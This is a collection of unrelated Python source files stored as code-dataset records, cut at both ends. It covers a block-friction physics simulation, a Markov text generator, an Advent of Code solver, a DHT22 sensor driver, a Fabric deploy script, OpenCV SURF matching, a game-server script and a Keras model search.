: F_VR = 0.\n #---------------------------\n\n M_VL = F_VL * ( A*cos(R ) + H *sin(R ) )\n M_VR = -F_VR * ( A*cos(R ) - H *sin(R ) )\n M_VLm = -F_VL * ( A*cos(Rm) - Hm*sin(Rm) )\n M_VRm = F_VR * ( A*cos(Rm) + Hm*sin(Rm) )\n\n #} \n\n #{ Assemble Forces\n AccelF = (F_VL + F_VR ) / M\n AccelM = (M_VL + M_VR ) / I\n AccelFm = -(F_VL + F_VR ) / Mm\n AccelMm = (M_VLm + M_VRm) / Im\n \n # Add Accel on (K,L)\n IndexW = Core['Index'][K][L]*6\n Accel[IndexW+3] += AccelF # DDW\n Accel[IndexW+5] += AccelM # DDR\n \n # Add Accel on (K,L-1)\n if L!=1: # Normal Blocks\n IndexWm = Core['Index'][K][L-1]*6\n Accel[IndexWm+3] += AccelFm # DDW\n Accel[IndexWm+5] += AccelMm # DDR\n \n elif Core['Flag_CSB']==True: # Add Accel on CSB\n pass # if CSB: Do nothing\n\n else: pass # if Base: Do nothing\n \n #}\n\n #{ VERBOSE\n if '/ForceV/' in VERBOSE:\n Verbose('-'*80)\n Verbose('Force_Block_V(), F_V Caculation Verification')\n Verbose('Block (%d,%d)'%(K,L))\n Verbose('U, DU, W, DW, R, DR = %e, %e, %e, %e, %e, %e'%(U,DU,W,DW,R,DR))\n Verbose('Um,DUm,Wm,DWm,Rm,DRm = %e, %e, %e, %e, %e, %e'%(Um,DUm,Wm,DWm,Rm,DRm))\n Verbose('Gamma = %e, %e'%(Gamma_L,Gamma_R))\n Verbose('DGamma = %e, %e'%(DGamma_L,DGamma_R))\n Verbose('FV = %e, %e'%(F_VL,F_VR))\n Verbose('MFV = %e, %e, %e, %e'%(M_VL,M_VR,M_VLm,M_VRm))\n Verbose('Accel(%d,%d) = %e, %e'%(K,L,AccelF,AccelM))\n Verbose('Accel[%d] = %e'%(IndexW+3,Accel[IndexW+3]))\n Verbose('Accel[%d] = %e'%(IndexW+5,Accel[IndexW+5]))\n if L!=1:\n Verbose('Accel(%d,%d) = %e, %e'%(K,L-1,AccelFm,AccelMm))\n Verbose('Accel[%d] = %e'%(IndexWm+3,Accel[IndexWm+3]))\n Verbose('Accel[%d] = %e'%(IndexWm+5,Accel[IndexWm+5]))\n #}\n \n #{ POST\n if POST==True:\n temp = '%e, '%t\n temp += '%e, %e, %e, %e, %e, '%(Gamma_L,DGamma_L,F_VL,M_VL,M_VLm)\n temp += '%e, %e, %e, %e, %e '%(Gamma_R,DGamma_R,F_VR,M_VR,M_VRm)\n temp += '\\n'\n fo = open(FO_DIR+'/(%2d,%2d)_V.csv'%(K,L),'a')\n fo.write(temp)\n fo.close()\n #}\n\n# #\n# #\n# END OF VERTICAL FORCES #\n#}############################################################################\n\n\n##############################################################################\n#{ FRICTION FORCES #\n# #\n# #\n\n#(v04f) if Core['ApplyForces']['Block_F']==True:\n if Core['ApplyForces']['Block_VF']==True:\n #{\n\n #{ Init\n xi_L=xi_R=0\n F_FL=F_FLm=M_FL=M_FLm=F_FR=F_FRm=M_FR=M_FRm=0\n #}\n \n #===========================================================================\n #{ LEFT start\n \n # Vertical Reaction should be positive\n if F_VL>0: \n \n # Relative Velocity\n xi_L = DU - ( H * cos( R ) - A * sin( R ) ) * DR\n if L!=1:\n xi_L -= DUm + ( Hm * cos( Rm ) + A * sin( Rm ) ) * DRm\n else:\n xi_L -= DUm\n \n # Relative Velocity should be nonzero\n if xi_L!=0:\n \n # Friction Force: F_FL \n if abs(xi_L) <= xi_F_cr:\n # Viscous Slip Condition\n F_FL = - mu_s * F_VL * xi_L / xi_F_cr\n else:\n # Slip Condition\n mu = mu_k + (mu_s - mu_k) * exp( -d_mu*(abs(xi_L)-xi_F_cr) )\n F_FL = - (+(xi_L>0) or -(xi_L<0)) * mu * F_VL\n \n # Other Forces & Moments: F_FLm, M_FL, M_FLm\n F_FLm = -F_FL\n M_FL = -F_FL * ( H * cos( R ) - A * sin( R ) )\n if L!=1:\n M_FLm = F_FLm * ( Hm * cos( Rm ) + A * sin( Rm ) )\n \n # Check Point: xi==0 -> Do nothing\n \n # Check Point: F_VL<=0 -> Do nothing\n \n \n # LEFT end\n #}===========================================================================\n \n \n #===========================================================================\n #{ RIGHT start\n \n # Vertical Reaction should be positive\n if F_VR>0: \n \n # Relative Velocity\n xi_R = DU - ( H * 
cos( R ) + A * sin( R ) ) * DR\n if L!=1:\n xi_R -= DUm + ( Hm * cos( Rm ) - A * sin( Rm ) ) * DRm\n else:\n xi_R -= DUm\n \n # Relative Velocity should be nonzero\n if xi_R!=0:\n \n # Friction Force: F_FR \n if abs(xi_R) <= xi_F_cr:\n # Viscous Slip Condition\n F_FR = - mu_s * F_VR * xi_R / xi_F_cr\n else:\n # Slip Condition\n mu = mu_k + (mu_s - mu_k) * exp( -d_mu*(abs(xi_R)-xi_F_cr) )\n F_FR = - (+(xi_R>0) or -(xi_R<0)) * mu * F_VR\n \n # Other Forces & Moments: F_FRm, M_FR, M_FRm\n F_FRm = -F_FR\n M_FR = -F_FR * ( H * cos( R ) + A * sin( R ) )\n if L!=1:\n M_FRm = F_FRm * ( Hm * cos( Rm ) - A * sin( Rm ) )\n \n # Check Point: xi==0 -> Do nothing\n \n # Check Point: F_VR<=0 -> Do nothing\n \n \n # RIGHT end\n #}===========================================================================\n \n #{ Assemble Accel\n AccelF = (F_FL + F_FR ) / M\n AccelM = (M_FL + M_FR ) / I\n AccelFm = -(F_FL + F_FR ) / Mm\n AccelMm = (M_FLm + M_FRm) / Im\n \n # Add Accel on (K,L)\n IndexW = Core['Index'][K][L]*6\n Accel[IndexW+1] += AccelF # DDU\n Accel[IndexW+5] += AccelM # DDR\n \n # Add Accel on (K,L-1)\n \n if L!=1: # Normal Blocks\n IndexWm = Core['Index'][K][L-1]*6\n Accel[IndexWm+1] += AccelFm # DDU\n Accel[IndexWm+5] += AccelMm # DDR\n \n elif Core['Flag_CSB']==True: # Add Accel on CSB\n#(v04f) IndexWm = Core['Index'][K][L-1]*6\n IndexWm = Core['Index'][1][0]*6\n Accel[IndexWm+1] += AccelFm # DDU\n pass # No moment on CSB\n \n else: pass # if Base: Do nothing\n #}\n\n #{ VERBOSE\n if '/ForceVF/' in VERBOSE:\n Verbose('-'*80)\n Verbose('Force_Block_V_F(), Friction Caculation Verification')\n Verbose('Block (%d,%d)'%(K,L))\n Verbose('U, DU, W, DW, R, DR = %e, %e, %e, %e, %e, %e'%(U,DU,W,DW,R,DR))\n Verbose('Um,DUm,Wm,DWm,Rm,DRm = %e, %e, %e, %e, %e, %e'%(Um,DUm,Wm,DWm,Rm,DRm))\n Verbose('xi = %e, %e'%(xi_L,xi_R))\n Verbose('FF = %e, %e'%(F_FL,F_FR))\n Verbose('MF = %e, %e, %e, %e'%(M_FL,M_FR,M_FLm,M_FRm))\n Verbose('Accel(%d,%d) = %e, %e'%(K,L,AccelF,AccelM))\n Verbose('Accel[%d] = %e'%(IndexW+1,Accel[IndexW+1]))\n Verbose('Accel[%d] = %e'%(IndexW+5,Accel[IndexW+5]))\n if L!=1:\n Verbose('Accel(%d,%d) = %e, %e'%(K,L-1,AccelFm,AccelMm))\n Verbose('Accel[%d] = %e'%(IndexWm+1,Accel[IndexWm+1]))\n Verbose('Accel[%d] = %e'%(IndexWm+5,Accel[IndexWm+5]))\n #}\n\n #{ POST\n if POST==True:\n temp = '%e, '%t\n temp += '%e, %e, %e, %e, '%( xi_L, F_FL, M_FL, M_FLm )\n temp += '%e, %e, %e, %e '%( xi_R, F_FR, M_FR, M_FRm )\n temp += '\\n'\n fo = open(FO_DIR+'/(%2d,%2d)_VF.csv'%(K,L),'a')\n fo.write(temp)\n fo.close()\n #}\n\n \n #}\n \n \n# #\n# #\n# FRICTION FORCES #\n#}############################################################################\n\n\n # END\n return Accel\n#}\n#-------------------------------------------------------------------------\n","sub_path":"SAPCOR_v04h_Force_Block_V_F_Build004.py","file_name":"SAPCOR_v04h_Force_Block_V_F_Build004.py","file_ext":"py","file_size_in_byte":12892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"143587971","text":"import random\n# 마르코프 체인 딕셔너리 만들기 --- (※1)\ndef make_dic(words):\n tmp = [\"@\"]\n dic = {}\n for word in words:\n tmp.append(word)\n if len(tmp) < 3: continue\n if len(tmp) > 3: tmp = tmp[1:]\n set_word3(dic, tmp)\n if word == \".\":\n tmp = [\"@\"]\n continue\n return dic\n# 딕셔너리에 데이터 등록하기 --- (※2)\ndef set_word3(dic, s3):\n w1, w2, w3 = s3\n if not w1 in dic: dic[w1] = {}\n if not w2 in dic[w1]: dic[w1][w2] = {}\n if not w3 in dic[w1][w2]: dic[w1][w2][w3] = 0\n dic[w1][w2][w3] += 1\n# 문장 만들기 --- 
(※3)\ndef make_sentence(dic):\n    ret = []\n    if not \"@\" in dic: return \"no dic\" \n    top = dic[\"@\"]\n    w1 = word_choice(top)\n    w2 = word_choice(top[w1])\n    ret.append(w1)\n    ret.append(w2)\n    while True:\n        w3 = word_choice(dic[w1][w2])\n        ret.append(w3)\n        if w3 == \".\": break\n        w1, w2 = w2, w3\n    ret = \" \".join(ret)\n\n    return ret\n\ndef word_choice(sel):\n    keys = sel.keys()\n    return random.choice(list(keys))","sub_path":"tutorials/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344903626","text":"import itertools\nimport operator\n\n# itertools.accumulate(iterable[, func])\n\n\"\"\"\nMultiplies the numbers from the data list together.\n\"\"\"\n\ndata = [1,2,3,4,5]\n\nresult = itertools.accumulate(data, operator.mul)\nfor each in result:\n    print(each)\n\nprint('-'*30)\n# itertools.count(start=0, step = 1)\n\n\"\"\"\nCounts up from 10 in steps of 3.\n\"\"\"\n\nfor i in itertools.count(10,3):\n    print(i)\n    if i > 20:\n        break\n\nprint('-'*30)\n\n# itertools.cycle(iterable)\n\n\"\"\"\nCycles through the iterable endlessly.\n\"\"\"\n\nmonth = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\n# for m in itertools.cycle(month):\n#     print(m)\n#\n\n# itertools.chain(*\n","sub_path":"venv/Include/Funkcje-scenariusze zastosowań/itertools przegląd.py","file_name":"itertools przegląd.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"290366881","text":"import re\nfrom typing import Tuple, Callable, Iterable, Optional\nimport sys\nfname=sys.argv[1] if len(sys.argv)>1 else \"input2\"\nf = open(fname)\nftext=f.read()\nf=[line.strip() for line in ftext.split(\"Blueprint\")[1:]]\n\nfrom collections import defaultdict\n\nd=defaultdict(int)\n\n#copied from https://github.com/joefarebrother/adventofcode/blob/master/misc_utils.py\ndef lmap(f: Callable, *xs) -> list:\n \"\"\"Like map but returns a list\"\"\"\n return list(map(f, *xs))\n\ndef ints(xs: Iterable) -> list[int]:\n \"\"\"Casts each element of xs to an int\"\"\"\n return lmap(int, xs)\n\ndef mint(x, default=None):\n \"\"\"Maybe int - casts to int and returns default on failure\"\"\"\n try:\n return int(x)\n except ValueError:\n return default\n\ndef ints_in(x: str) -> list[int]:\n \"\"\"Finds and parses all integers in the string x\"\"\"\n ex = r'(?:(?20:\n print(t,costs,mm,rs)\n if t<=1:#robots built now don't count\n return 0\n mx = 0\n #if all(a=max(costs[i][0] for i in range(1,4)):\n continue\n if 5-ix>t:\n continue\n if any (costs[ix][i]>0 and rs[i]==0 for i in range(1,3)):\n continue\n #print(costs[ix],ix,rs,mm)\n tt = 1 + max( 1+((max(0,costs[ix][i]-mm[i])-1)//rs[i]) for i in range(3) if costs[ix][i]>0)\n rs_ = Pt(x+(j==ix) for j,x in enumerate(rs))\n #print(tt)\n #if t>12:\n #print(t,tt,ix,costs[ix], )\n #print(t-tt,mm+(tt*rs)-costs[ix],rs_)\n #print(best(costs,t-tt,mm+(tt*rs)-costs[ix],rs_) + (t-tt)*(ix==4))\n mx = max(mx, best(costs,t-tt,mm+(tt*rs)-costs[ix],rs_) + (t-tt)*(ix==3))\n\n cache[(t,mm,rs)]=mx\n return mx\n\n# how many of each robot to build\ndef instrs(costs,ins):\n ix = 0\n rs = [1,0,0,0]\n mm=[0,0,0,0]\n for i in range(24):\n #print(mm)\n nr=[0,0,0,0]\n while True:\n if ins[ix]==0:\n ix+=1\n continue\n if any(c>m for c,m in zip(costs[ix],mm)):\n break\n ins[ix]-=1\n nr[ix]+=1\n for k in range(4):\n mm[k]-=costs[ix][k]\n for k in range(4):\n mm[k]+=rs[k]\n rs[k]+=nr[k]\n print(i+1,mm,rs)\n
return mm[-1]\n\ndef fa(costs):\n rs = [1,0,0,0]\n mm=[0,0,0,0]\n for i in range(24):\n nr=[0,0,0,0]\n for k in range(3,0,-1):\n if rs[k-1]==0:\n continue\n #costs[k]/\n while True:\n if ins[ix]==0:\n ix+=1\n continue\n if any(c>m for c,m in zip(costs[ix],mm)):\n break\n ins[ix]-=1\n nr[ix]+=1\n for k in range(4):\n mm[k]-=costs[ix][k]\n for k in range(4):\n mm[k]+=rs[k]\n rs[k]+=nr[k]\n print(i+1,mm,rs)\n return mm[-1]\n \n\n\nl=[]\nprint(\"here\")\n\"\"\"\nfor a,cs in enumerate(bps):\n mx=0\n for i in range(4,5):\n for j in range(2,3):\n things = [0,i,j,100]\n v = instrs(cs,list(things))\n print(i,j,v)\n \n mx=max(mx,v)\n l.append((a+1)*mx)\n print(l[-1])\n\"\"\"\nfor a,cs in enumerate(bps):\n if a<3:\n l.append(best(cs))\n print(l[-1])\n cache={}\np=1\nfor x in l:\n p*=x\nprint(p)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"19/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37730981","text":"'''\nCreated on 16/03/2015\n\n@author: Junior Mascarenhas\n'''\nimport RPi.GPIO as GPIO\nfrom abstractclass.humiditySensor import HumiditySensor\nimport atexit\nimport pigpio\nimport time\n\nclass DHT22Humidity(HumiditySensor):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n HumiditySensor.__init__(self)\n self.setup()\n\n def setup(self):\n \"\"\"\n Setup the board and GPIO \n @return: void\n \"\"\"\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n self.__pin = 23\n self.__data = []\n self.__crc = \"\"\n self.__humidity = \"\"\n self.__temperature = \"\"\n self.cb = None\n\n atexit.register(self.__cancel)\n\n self.bad_CS = 0 # Bad checksum count.\n self.bad_SM = 0 # Short message count.\n self.bad_MM = 0 # Missing message count.\n self.bad_SR = 0 # Sensor reset count.\n\n # Power cycle if timeout > MAX_TIMEOUTS.\n self.no_response = 0\n self.MAX_NO_RESPONSE = 2\n\n self.rhum = -999\n self.temp = -999\n\n self.tov = None\n\n self.high_tick = 0\n self.bit = 40\n self.pi = pigpio.pi()\n self.pi.set_pull_up_down(self.__pin, pigpio.PUD_OFF)\n\n self.pi.set_watchdog(self.__pin, 0) # Kill any watchdogs.\n\n self.cb = self.pi.callback(self.__pin, pigpio.EITHER_EDGE, self.__cb)\n\n def changeSetup(self, pin):\n \"\"\"\n @param pin: the GPIO pin used to wire the sensor.\n @return: void\n \"\"\"\n self.__pin = pin\n\n def __cb(self, pin, level, tick):\n \"\"\"\n Accumulate the 40 data bits. 
Format into 5 bytes, humidity high,\n humidity low, temperature high, temperature low, checksum.\n @param pin: the pin used to read data\n @type pin: int8\n @param level: the level\n @type level: int8\n @param tick: Tick used to diff\n @type tick: int8\n \"\"\"\n \n diff = pigpio.tickDiff(self.high_tick, tick)\n\n if level == 0:\n # Edge length determines if bit is 1 or 0.\n if (diff >= 50):\n val = 1\n if (diff >= 200): # Bad bit?\n self.CS = 256 # Force bad checksum.\n else:\n val = 0\n if (self.bit >= 40): # Message complete.\n self.bit = 40\n elif (self.bit >= 32): # In checksum byte.\n self.CS = (self.CS << 1) + val\n if (self.bit == 39):\n # 40th bit received.\n self.pi.set_watchdog(self.__pin, 0)\n self.no_response = 0\n total = self.hH + self.hL + self.tH + self.tL\n if ((total & 255) == self.CS): # Is checksum ok?\n self.rhum = ((self.hH << 8) + self.hL) * 0.1\n if (self.tH & 128): # Negative temperature.\n mult = -0.1\n self.tH = self.tH & 127\n else:\n mult = 0.1\n self.temp = ((self.tH << 8) + self.tL) * mult\n self.tov = time.time()\n else:\n self.bad_CS += 1\n elif (self.bit >= 24): # in temp low byte\n self.tL = (self.tL << 1) + val\n elif (self.bit >= 16): # in temp high byte\n self.tH = (self.tH << 1) + val\n elif (self.bit >= 8): # in humidity low byte\n self.hL = (self.hL << 1) + val\n elif (self.bit >= 0): # in humidity high byte\n self.hH = (self.hH << 1) + val\n else: # header bits\n pass\n self.bit += 1\n elif (level == 1):\n self.high_tick = tick\n if (diff > 250000):\n self.bit = -2\n self.hH = 0\n self.hL = 0\n self.tH = 0\n self.tL = 0\n self.CS = 0\n else: # level == pigpio.TIMEOUT:\n self.pi.set_watchdog(self.__pin, 0)\n if (self.bit < 8): # Too few data bits received.\n self.bad_MM += 1 # Bump missing message count.\n self.no_response += 1\n if (self.no_response > self.MAX_NO_RESPONSE):\n self.no_response = 0\n self.bad_SR += 1 # Bump sensor reset count.\n elif (self.bit < 39): # Short message receieved.\n self.bad_SM += 1 # Bump short message count.\n self.no_response = 0\n else: # Full message received.\n self.no_response = 0\n\n def getHumidity(self):\n \"\"\"\n Gets the humidity from the sensor\n @return: The humidity read\n @rtype: float\n \"\"\"\n self.__trigger()\n time.sleep(0.2)\n self.cb = self.pi.callback(self.__pin, pigpio.EITHER_EDGE, self.__cb)\n return self.rhum\n\n def __trigger(self):\n \"\"\"Trigger a new relative humidity and temperature reading.\"\"\"\n self.pi.write(self.__pin, pigpio.LOW)\n time.sleep(0.017) # 17 ms\n self.pi.set_mode(self.__pin, pigpio.INPUT)\n self.pi.set_watchdog(self.__pin, 200)\n\n def __cancel(self):\n \"\"\"Cancel the DHT22 sensor.\"\"\"\n\n self.pi.set_watchdog(self.__pin, 0)\n if (self.cb != None):\n self.cb.cancel()\n self.cb = None\n self.pi.stop()\n","sub_path":"concretesensor/dht22Humidity.py","file_name":"dht22Humidity.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"441073073","text":"#!/usr/bin/env python\nfrom fabric.api import *\n\n# the user to use for the remote commands\nenv.user = 'weehowe-z'\n# the servers where the commands are executed\nenv.hosts = ['sr.delvin.xyz:717']\n\ndef pack():\n # create a new source distribution as tarball\n local('python setup.py sdist --formats=gztar', capture=False)\n\ndef deploy():\n # figure out the release name and version\n dist = local('python setup.py --fullname', capture=True).strip()\n # upload the source tarball to the temporary folder on the server\n 
put('dist/%s.tar.gz' % dist, '/tmp/sr.tar.gz')\n # create a place where we can unzip the tarball, then enter\n # that directory and unzip it\n sudo('rm -rf /tmp/sr')\n run('mkdir /tmp/sr')\n with cd('/tmp/sr'):\n run('tar xzf /tmp/sr.tar.gz')\n # now setup the package with our virtual environment's\n # run('mv ' + dist + '/*. ')\n # python interpreter\n sudo('cp -r -f /tmp/sr/' + dist + '/app/* /var/www/sr/env/app/')\n with cd ('/var/www/sr/env'):\n sudo('/var/www/sr/env/bin/python ' +'/tmp/sr/'+ dist + '/setup.py install')\n # now that all is set up, delete the folder again\n sudo('rm -rf /tmp/sr /tmp/sr.tar.gz')\n sudo('service apache2 restart')\n # and finally touch the .wsgi file so that mod_wsgi triggers\n # a reload of the application","sub_path":"homepage/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550046571","text":"from dataclasses import dataclass\nfrom jsondataclass import to_dict, DataClassMapper\n\n\n@dataclass\nclass User:\n id: int\n name: str\n\n\nuser = User(1, \"John Doe\")\n\nmapper = DataClassMapper()\ndict_obj = mapper.to_dict(user)\nprint(dict_obj)\n# {'id': 1, 'name': 'John Doe'}\n\n# or\ndict_obj = to_dict(user)\nprint(dict_obj)\n# {'id': 1, 'name': 'John Doe'}\n","sub_path":"examples/to_dict.py","file_name":"to_dict.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"152663945","text":"from src.dimReduction.interfaces.ReductionModel import ReductionModel\nimport numpy as np\nfrom sklearn import preprocessing\n\nclass SVD(ReductionModel):\n def __init__(self, dataMatrix, k=None):\n super(SVD, self).__init__(dataMatrix)\n self.k = k\n\n def getDecomposition(self):\n self.dataMatrix = preprocessing.scale(self.dataMatrix)\n u, s, vt = np.linalg.svd(self.dataMatrix, full_matrices=False)\n s = np.diag(s)\n if self.k is None:\n return u, s, vt\n len = s.shape[0]\n # rank_s = np.linalg.matrix_rank(s)\n # s[(rank_s - self.k):rank_s] = 0\n for i in range(self.k, len):\n s[i, i] = 0\n u=np.matmul(u , s)\n uT = np.transpose(np.matmul(u, s))\n uT = uT[~np.all(uT == 0, axis=1)]\n u = np.transpose(uT)\n\n for i in range(self.k):\n s[i, i] = 1\n vt = np.matmul(s, vt)\n vt = vt[~np.all(vt == 0, axis=1)]\n\n return u, vt\n","sub_path":"src/dimReduction/SVD.py","file_name":"SVD.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463638260","text":"# NATIVE IMPORTS\n\nimport time\nfrom threading import Thread\n\n# GTAORANGE IMPORTS\n\nimport GTAOrange.player as Player\nimport GTAOrange.vehicle as Vehicle\n\n# PRIVATE FUNCTIONS\n\ndef _sendPlayerList(target):\n players = Player.getAll()\n target.chatMsg(\"Players:\")\n\n for player in players.values():\n target.chatMsg(player.getName())\n\n\ndef _threadTest():\n i = 0\n\n while True:\n\n print(i)\n i += 1\n\n time.sleep(1000)\n\n# EVENT HANDLERS\n\ndef _onPlayerConnect(player, ip):\n print('Player:connect | ' + str(player.getName()) + ' | ' + ip)\n\n # on first spawn\n player.setPosition(100.0, -1940.0, 21.0)\n\n # ofc you can define own attributes, as long as they don't replace each other\n player.testveh = None\n\ndef _onPlayerDisconnect(player, reason):\n print('Player:disconnect | ' + str(player.getID()) + ' | ' + str(reason))\n\ndef _onPlayerCommand(player, command):\n print(\"command\")\n command = 
command.split()\n\n # player commands\n\n if command[0] == \"/setpos\":\n player.setPosition(float(command[1]), float(\n command[2]), float(command[3]))\n\n elif command[0] == \"/players\":\n _sendPlayerList(player)\n\n elif command[0] == \"/getpos\":\n # chat\n x, y, z = player.getPosition()\n player.chatMsg(\"{:.9f}\".format(x) + \"|\" +\n \"{:.9f}\".format(y) + \"|\" + \"{:.9f}\".format(z))\n\n # server console\n coords = player.getPosition()\n print(coords)\n\n # thread example\n\n elif command[0] == \"/thread\":\n t = Thread(target=_threadTest)\n t.daemon = True\n t.start()\n\n # vehicle commands\n\n elif command[0] == \"/veh\":\n\n # spawns a Burrito at your position\n if command[1] == \"create\":\n if player.testveh is None:\n x, y, z = player.getPosition()\n\n player.testveh = Vehicle.create(\n \"Burrito\", x, y, z, player.getHeading())\n player.setIntoVeh(player.testveh)\n\n player.chatMsg(\"Created a Burrito! :-) | ID: \" +\n str(player.testveh.id))\n else:\n player.chatMsg(\"Please delete your car before!\")\n\n # deletes the Burrito you've spawned\n elif command[1] == \"delete\":\n if player.testveh is not None:\n player.testveh.delete()\n player.testveh = None\n else:\n player.chatMsg(\"Please create a car before!\")\n\n # sends position of Burrito to chat and server console\n elif command[1] == \"getpos\":\n if player.testveh is not None:\n # chat\n x, y, z = player.testveh.getPosition()\n player.chatMsg(\"{:.9f}\".format(x) + \"|\" + \"{:.9f}\".format(y) + \"|\" + \"{:.9f}\".format(z))\n\n # server console\n val = player.testveh.getPosition()\n print(val)\n else:\n player.chatMsg(\"Please create a car before!\")\n\n else:\n print(' '.join(command))\n\n return True\n\n\ndef _onPlayerEnteredVehicle(player, veh):\n print('Vehicle:playerentered | ' +\n str(player.getID()) + ' | ' + str(veh.getID()))\n\n\ndef _onPlayerLeftVehicle(player, veh):\n print('Vehicle:playerleft | ' + str(player.getID()) + ' | ' + str(veh.getID()))\n\n\n# REGISTER EVENT HANDLERS\n\nPlayer.on(\"connect\", _onPlayerConnect)\nPlayer.on(\"disconnect\", _onPlayerDisconnect)\nPlayer.on(\"command\", _onPlayerCommand)\n\nVehicle.on(\"playerentered\", _onPlayerEnteredVehicle)\nVehicle.on(\"playerleft\", _onPlayerLeftVehicle)\n","sub_path":"resources/python_example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326796514","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n\n\n# Call function SURF\ndef SURF():\n # Initiate SURF detector\n SURF = cv2.xfeatures2d.SURF_create()\n\n return SURF\n\nimgpath1 = \"image1.jpg\"\nimgpath2 = \"image2.jpg\"\n\n# Open and Convert the input image from BGR to GRAYSCALE\nimage1 = cv2.imread(filename = imgpath1,\n flags = cv2.IMREAD_GRAYSCALE)\nimage2 = cv2.imread(filename = imgpath2,\n flags = cv2.IMREAD_GRAYSCALE)\n\nnormType = cv2.NORM_L2\nsurf_object = SURF()\n\nkp1, des1 = surf_object.detectAndCompute(image1,None)\nkp2, des2 = surf_object.detectAndCompute(image2,None)\n\n# Create BFMatcher object\n\"\"\"\nBrute-force descriptor matcher.\n\nFor each descriptor in the first set, this matcher finds the closest descriptor in the second set by trying each one. 
This descriptor matcher supports masking permissible matches of descriptor sets.\n\n\"\"\"\nBFMatcher = cv2.BFMatcher(normType = normType,\n crossCheck = True)\n\n# Matching descriptor vectors using Brute Force Matcher\nmatches = BFMatcher.match(queryDescriptors = des1,\n trainDescriptors = des2)\n\n# Sort them in the order of their distance\nmatches = sorted(matches, key = lambda x: x.distance)\n\noutput = cv2.drawMatches(img1 = image1,\n keypoints1 = kp1,\n img2 = image2,\n keypoints2 = kp2,\n matches1to2 = matches[:30],\n outImg = None,\n flags = cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\n\ncv2.imwrite('orb_output.jpg', output)","sub_path":"04_feature_matching_surf.py","file_name":"04_feature_matching_surf.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213621077","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras.models import load_model\n\nfrom random_search_lion_king import random_search\n\n# Importing data\ntrain_dataset = pd.read_csv(r'data/Workflow_new_SP_DR_shiny_FS_train_dataset.csv')\ntest_dataset = pd.read_csv(r'data/Workflow_new_SP_DR_shiny_FS_test_dataset.csv')\nfull_dataset = pd.concat([train_dataset, test_dataset], axis=0)\n\ncols_to_drop = [\n 'GRID_ID', 'Label', 'Signatory_NO_errors_last_5_days',\n 'Signatory_NO_cases_last_5_days', 'Signatory_NO_errors_last_month',\n 'Signatory_NO_cases_month']\n\ntrain_data = train_dataset.drop(cols_to_drop, axis=1)\ntest_data = test_dataset.drop(cols_to_drop, axis=1)\ntrain_labels = train_dataset.pop('Label')\ntest_labels = test_dataset.pop('Label')\n# train_id = train_dataset.pop('GRID_ID')\n# test_id = test_dataset.pop('GRID_ID')\n\n# Get output\nmodels_list, output_table = random_search(\n train_data, train_labels, test_data, test_labels,\n max_iter=1000, max_hours=3.5, min_auc=0.65, max_overfit_auc=0.05)\n\n# Compare results with the best model so far\nbest_model = load_model(r'final_model_DR.h5')\ntrain_predictions = best_model.predict(train_data)\ntest_predictions = best_model.predict(test_data)\n# Check auc scores of best model without cross validation\nauc_train = roc_auc_score(train_labels, train_predictions)\nauc_test = roc_auc_score(test_labels, test_predictions)\n\n# Best model cross validation on full dataset (union on train & test)\nfull_data = full_dataset.drop(cols_to_drop, axis=1)\nfull_labels = full_dataset.pop('Label')\n# full_id = full_id.pop('GRID_ID')\n\nseed = np.random.RandomState(0)\n# Stratified KFold validation\nstr_kfold_auc_scores = []\nstr_kf = StratifiedKFold(n_splits=5, random_state=seed, shuffle=True)\nfor train_index, test_index in str_kf.split(full_data, full_labels):\n X_train, y_train = full_data.iloc[train_index], full_labels.iloc[train_index]\n X_test, y_test = full_data.iloc[test_index], full_labels.iloc[test_index]\n history = best_model.fit(X_train, y_train)\n predictions = best_model.predict(X_test)\n str_kfold_auc_scores.append(roc_auc_score(y_test, predictions))\nstr_kfold_auc_mean = np.mean(str_kfold_auc_scores)\nstr_kfold_auc_std = np.std(str_kfold_auc_scores)\n\n# Ordinary KFold cross validation\nkfold_auc_scores = []\ncv = KFold(n_splits=5, random_state=seed, shuffle=True)\nfor train_index, test_index in cv.split(full_data):\n X_test, y_test = full_data.iloc[test_index], full_labels.iloc[test_index]\n history = best_model.fit(X_train, y_train)\n predictions = 
